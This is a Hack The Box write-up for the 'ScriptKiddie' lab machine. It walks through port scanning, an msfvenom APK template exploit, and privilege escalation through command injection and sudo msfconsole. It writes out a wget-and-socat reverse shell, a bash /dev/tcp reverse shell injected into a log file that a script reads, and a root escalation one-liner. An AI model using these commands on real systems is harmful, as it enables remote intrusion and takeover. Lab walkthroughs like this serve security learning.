ScriptKiddie

ScriptKiddie is an easy machine from Hack The Box.

Enumeration

I start with a quick nmap scan to enumerate open ports.

nmap -sC -sV -oN nmap/basic scriptkiddie.htb

The results indicate a pretty barebones machine, only ports 22 and 5000 are open.

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 3c:65:6b:c2:df:b9:9d:62:74:27:a7:b8:a9:d3:25:2c (RSA)
|   256 b9:a1:78:5d:3c:1b:25:e0:3c:ef:67:8d:71:d3:a3:ec (ECDSA)
|_  256 8b:cf:41:82:c6:ac:ef:91:80:37:7c:c9:45:11:e8:43 (ED25519)
5000/tcp open  http    Werkzeug httpd 0.16.1 (Python 3.8.5)
|_http-server-header: Werkzeug/0.16.1 Python/3.8.5
|_http-title: k1d'5 h4ck3r t00l5
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

I ran a couple of gobuster searches in the background to enumerate web directories and possible subdomains, but I didn't find anything.

The webpage appeared to have a few different functionalities. It seems like it will run an nmap scan, create msfvenom payloads, or run searchsploit on user input.

Webpage

Initial Foothold

After searching for information about the backend system, I found an RCE script for Werkzeug, but it did not seem to work as the debugging function in question is not enabled on the server.

The msfvenom widget has Android templates as an optional file upload and, after a bit of googling, I found this script.

Essentially, it exploits a vulnerability in msfvenom that will execute a payload hidden inside a .apk template. I used apk.py to generate the malicious package.

I tried a few different bash reverse shells as my payload, but using socat was what got me onto the machine.

wget -q http://10.10.14.16/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.10.14.16:4444

I am on as the user kid.

Privesc

I did some poking around the filesystem, ran linPEAS, and found indications of a possible sudo vulnerability, but that ended up being a dead-end.

Inside the user pwn directory, there is a script called scanlosers.sh. As far as I can tell, the script takes data from the file /home/kid/logs/hackers to run an nmap command.

I can write to hackers because kid is the owner.

So, I started a listener and used echo to place a reverse shell into hackers, with a ; at the beginning to start a new command and a # at the end to comment out the rest of the script.

echo " ; /bin/bash -c 'bash -i >& /dev/tcp/10.10.14.16/1234 0>&1' #" >> hackers

Now, I’m on as user pwn.

I ran a quick sudo -l to check pwn’s permissions.

The results indicate that I can run msfconsole as root without a password.

Checking the msfconsole help page, I found a -x flag that will execute console commands.

sudo msfconsole -x su

Root access!

Written on June 5, 2021